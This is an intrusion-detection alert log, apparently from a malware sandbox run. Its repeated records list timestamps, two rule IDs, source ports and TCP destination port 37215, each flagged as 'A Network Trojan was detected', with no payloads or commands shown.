              Timestamp:06/13/24-21:32:58.822931
              SID:2835222
              Source Port:53102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191303
              SID:2829579
              Source Port:60724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635144
              SID:2835222
              Source Port:58242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156304
              SID:2829579
              Source Port:33146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755432
              SID:2829579
              Source Port:51992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305587
              SID:2829579
              Source Port:34690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988772
              SID:2835222
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508720
              SID:2829579
              Source Port:38258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755630
              SID:2829579
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272132
              SID:2835222
              Source Port:49676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239008
              SID:2835222
              Source Port:46664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076709
              SID:2835222
              Source Port:37756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317636
              SID:2835222
              Source Port:56634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156564
              SID:2835222
              Source Port:33670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043409
              SID:2829579
              Source Port:56690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242973
              SID:2829579
              Source Port:39340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168160
              SID:2835222
              Source Port:53988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709831
              SID:2835222
              Source Port:42794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753412
              SID:2829579
              Source Port:37468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485850
              SID:2835222
              Source Port:57950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913960
              SID:2835222
              Source Port:36564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153214
              SID:2835222
              Source Port:48042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729967
              SID:2835222
              Source Port:40024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301220
              SID:2829579
              Source Port:43594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377580
              SID:2835222
              Source Port:47628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994381
              SID:2835222
              Source Port:45124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755217
              SID:2835222
              Source Port:34486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669813
              SID:2829579
              Source Port:46042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423925
              SID:2835222
              Source Port:39680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418711
              SID:2835222
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885352
              SID:2835222
              Source Port:37424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572321
              SID:2835222
              Source Port:38588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420592
              SID:2835222
              Source Port:36414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016642
              SID:2829579
              Source Port:37608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274005
              SID:2829579
              Source Port:38676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453647
              SID:2835222
              Source Port:47138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093591
              SID:2835222
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505526
              SID:2835222
              Source Port:44228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731369
              SID:2829579
              Source Port:49204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834441
              SID:2835222
              Source Port:39382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629808
              SID:2829579
              Source Port:42432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868268
              SID:2829579
              Source Port:52672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400751
              SID:2829579
              Source Port:41984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150789
              SID:2835222
              Source Port:38678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298661
              SID:2829579
              Source Port:59464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195012
              SID:2835222
              Source Port:37694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244178
              SID:2835222
              Source Port:40682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340375
              SID:2829579
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973300
              SID:2829579
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344643
              SID:2835222
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671295
              SID:2829579
              Source Port:54212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355006
              SID:2829579
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096257
              SID:2829579
              Source Port:44284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452862
              SID:2835222
              Source Port:46800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198270
              SID:2835222
              Source Port:58100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300210
              SID:2829579
              Source Port:43510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708427
              SID:2829579
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.138064
              SID:2829579
              Source Port:52060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670786
              SID:2829579
              Source Port:57322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218173
              SID:2835222
              Source Port:33582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098823
              SID:2835222
              Source Port:47982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017219
              SID:2835222
              Source Port:50994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308525
              SID:2829579
              Source Port:60116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451258
              SID:2829579
              Source Port:46842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044417
              SID:2835222
              Source Port:59674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263448
              SID:2829579
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258789
              SID:2829579
              Source Port:32844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868309
              SID:2835222
              Source Port:37084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246618
              SID:2835222
              Source Port:58764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014289
              SID:2829579
              Source Port:49356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245656
              SID:2829579
              Source Port:50150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403934
              SID:2829579
              Source Port:53948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348388
              SID:2829579
              Source Port:49848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158568
              SID:2829579
              Source Port:37936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217985
              SID:2835222
              Source Port:48996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990346
              SID:2835222
              Source Port:35616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406769
              SID:2835222
              Source Port:45152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039668
              SID:2829579
              Source Port:58776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274651
              SID:2829579
              Source Port:40334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012556
              SID:2829579
              Source Port:39988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972933
              SID:2829579
              Source Port:42750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671405
              SID:2835222
              Source Port:60060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403364
              SID:2835222
              Source Port:35868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567841
              SID:2829579
              Source Port:37686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165954
              SID:2835222
              Source Port:38176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277169
              SID:2835222
              Source Port:47158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093980
              SID:2835222
              Source Port:57286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193036
              SID:2835222
              Source Port:33316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218708
              SID:2835222
              Source Port:46454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941362
              SID:2829579
              Source Port:34032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453377
              SID:2835222
              Source Port:57710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484687
              SID:2829579
              Source Port:51586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832833
              SID:2835222
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372257
              SID:2835222
              Source Port:44296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177726
              SID:2829579
              Source Port:48724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417449
              SID:2835222
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834861
              SID:2829579
              Source Port:33948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344589
              SID:2829579
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420268
              SID:2829579
              Source Port:43092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091284
              SID:2829579
              Source Port:44058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553849
              SID:2829579
              Source Port:59726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278439
              SID:2835222
              Source Port:34586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546279
              SID:2835222
              Source Port:49050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252640
              SID:2829579
              Source Port:44384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456399
              SID:2829579
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954047
              SID:2829579
              Source Port:53516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217517
              SID:2829579
              Source Port:36874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756387
              SID:2829579
              Source Port:37854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437779
              SID:2829579
              Source Port:34308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543522
              SID:2829579
              Source Port:33432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632816
              SID:2829579
              Source Port:34276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820587
              SID:2829579
              Source Port:42612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298398
              SID:2829579
              Source Port:58608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042504
              SID:2835222
              Source Port:33142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011413
              SID:2829579
              Source Port:36376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.199872
              SID:2835222
              Source Port:53142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253266
              SID:2835222
              Source Port:55744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439993
              SID:2829579
              Source Port:49222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438408
              SID:2829579
              Source Port:41060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503076
              SID:2835222
              Source Port:42528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.454035
              SID:2829579
              Source Port:39326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505409
              SID:2835222
              Source Port:56790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092754
              SID:2829579
              Source Port:33344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710863
              SID:2835222
              Source Port:58212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028947
              SID:2835222
              Source Port:37212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279974
              SID:2835222
              Source Port:60560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106306
              SID:2835222
              Source Port:51504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524874
              SID:2835222
              Source Port:45790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457322
              SID:2835222
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217883
              SID:2835222
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549822
              SID:2835222
              Source Port:46592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785878
              SID:2835222
              Source Port:57360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346255
              SID:2829579
              Source Port:43226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228273
              SID:2835222
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610742
              SID:2829579
              Source Port:36602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097210
              SID:2835222
              Source Port:44188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566622
              SID:2829579
              Source Port:46168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158296
              SID:2835222
              Source Port:52318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991411
              SID:2829579
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273345
              SID:2829579
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675277
              SID:2835222
              Source Port:45618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026117
              SID:2829579
              Source Port:41382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991098
              SID:2835222
              Source Port:39814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935522
              SID:2829579
              Source Port:36310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167797
              SID:2835222
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407116
              SID:2835222
              Source Port:60834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707745
              SID:2829579
              Source Port:42864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632989
              SID:2829579
              Source Port:42164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043031
              SID:2829579
              Source Port:59672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159608
              SID:2835222
              Source Port:52790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275070
              SID:2829579
              Source Port:56280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421486
              SID:2829579
              Source Port:44192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931323
              SID:2829579
              Source Port:36166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725125
              SID:2835222
              Source Port:39072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111471
              SID:2829579
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091384
              SID:2829579
              Source Port:54666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671337
              SID:2829579
              Source Port:55610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244422
              SID:2835222
              Source Port:54062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424082
              SID:2835222
              Source Port:35958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016252
              SID:2829579
              Source Port:43004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475529
              SID:2829579
              Source Port:40058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509902
              SID:2829579
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213764
              SID:2835222
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954106
              SID:2829579
              Source Port:51502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608025
              SID:2835222
              Source Port:37968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570134
              SID:2835222
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169708
              SID:2829579
              Source Port:44580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341102
              SID:2835222
              Source Port:44614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416735
              SID:2829579
              Source Port:56364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073847
              SID:2835222
              Source Port:45630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027324
              SID:2835222
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615777
              SID:2835222
              Source Port:38846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458595
              SID:2829579
              Source Port:50666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077558
              SID:2829579
              Source Port:56402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153497
              SID:2829579
              Source Port:49710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672529
              SID:2829579
              Source Port:53494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566970
              SID:2835222
              Source Port:57270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611011
              SID:2835222
              Source Port:51626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307221
              SID:2835222
              Source Port:33510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954911
              SID:2835222
              Source Port:34236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195689
              SID:2829579
              Source Port:58284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970886
              SID:2835222
              Source Port:55380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486783
              SID:2835222
              Source Port:56540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870971
              SID:2835222
              Source Port:41068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525538
              SID:2829579
              Source Port:42872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377610
              SID:2835222
              Source Port:41778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405647
              SID:2829579
              Source Port:44982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677203
              SID:2835222
              Source Port:54576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254913
              SID:2835222
              Source Port:46374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507412
              SID:2835222
              Source Port:60502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632189
              SID:2829579
              Source Port:58922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753705
              SID:2829579
              Source Port:49924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993922
              SID:2835222
              Source Port:57572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711810
              SID:2835222
              Source Port:35296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422275
              SID:2829579
              Source Port:38228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137673
              SID:2829579
              Source Port:33454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086751
              SID:2835222
              Source Port:55452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087329
